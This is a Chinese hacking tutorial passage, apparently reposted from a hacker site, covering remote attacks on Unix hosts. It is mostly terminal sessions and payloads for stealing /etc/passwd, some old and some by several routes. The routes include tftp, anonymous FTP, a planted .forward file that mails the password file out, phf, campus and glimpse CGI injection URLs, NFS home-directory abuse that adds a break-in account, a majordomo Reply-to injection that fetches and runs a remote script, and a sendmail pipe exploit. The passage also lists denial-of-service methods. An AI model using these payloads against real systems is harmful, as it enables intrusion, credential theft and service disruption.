列举出 victim.com 的系统类型(e.g.SunOS 5.7),提供的服务(e.g.WWW)和存在的脆弱性)
二、隔山打牛(远程攻击)
1) 隔空取物:取得passwd
1.1) tftp
# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit
(samsa:一无所获,但是...)
# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation
(samsa:成功了!!!;-)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa:可惜是shadow过了的:-/)
1.2) 匿名ftp
1.2.1) 直接获得
# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:
(samsa:your e-mail address,当然,是假的:->)
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)
1.2.2) ftp 主目录可写
# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed ''s/^/ /''|/bin/mail me@my.e-mail.addr"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail ftp@victim.com
(samsa:等着passwd文件随邮件来到吧...)
1.3) WWW
著名的cgi大bug
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me:@my.e-mail.
addr
(samsa:行太长,折了折,不要紧吧? ;-)
1.4) nfs
1.4.1) 如果把/etc共享出来,就不必说了
1.4.2) 如果某用户的主目录共享出来
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
$ cat >.forward
"| /bin/cat /etc/passwd|sed ''s/^/ /''|/bin/mail me@my.e-mail.addr"
^D
# echo test | mail zw@numen
(samsa:等着你的邮件吧....)
1.5) sniffer
利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
关于sniffer的原理和技术细节,见[samsa 1999].
(samsa:没什么意思,有种``胜之不武''''的感觉...)
1.6) NIS
1.6.1) 猜测域名,然后用ypcat(或对于NIS+:niscat)可获得passwd(甚至shadow)
1.6.2) 若能控制NIS服务器,可创建邮件别名
nis-master # echo ''foo: "| mail me@my.e-mail.addr < /etc/passwd "'' >> /etc/alias
s
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com
1.7) e-mail
e.g.利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp${IFS}me@hacker.home.edu:script${IFS}/tmp
/script;;source${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\@his.e-mail
# cat script
/bin/cat /etc/passwd|sed ''s/^/ /''|/bin/mail me@my.e-mail.addr
#
1.8) sendmail
利用sendmail 5.55的漏洞:
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is ''^]''.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail me@my.e-mail.addr < /etc/passwd"
250 "|/bin/mail me@my.e-mail.addr < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
(samsa:wait...)
2) 远程控制
2.1) DoS攻击
2.1.1) Syn-flooding
向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待# 耗费其
网络资源,从而导致其网络服务不可用。
2.1.2) Ping-flooding
向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接不暇 被尽?
2.1.3) Udp-stroming
类似2.1.2)发大量udp包。
2.1.4) E-mail bombing
发大量e-mail到对方邮箱,使其没有剩余容量接收正常邮件。
2.1.5) Nuking
向目标系统某端口发送一点特定数据,使之崩溃。
2.1.6) Hi-jacking
冒充特定网络连接之一放向网络上发送特定包(FIN或RST),以中止特定网络连接;
2.2) WWW(远程执行)
2.2.1) phf CGI
2.2.3) campus CGI
2.2.4) glimpse CGI
(samsa:在网上看见NT下也有一个叫websn.exe的buggy CGI,详情不清楚)
2.3) e-mail
同1.7,利用majordomo(ver. 1.94.3)的漏洞
2.4) sunrpc:rexd
(未完待序)
文章转载地址:http://www.cnpaf.net/Class/hack/05121820345017640226.htm
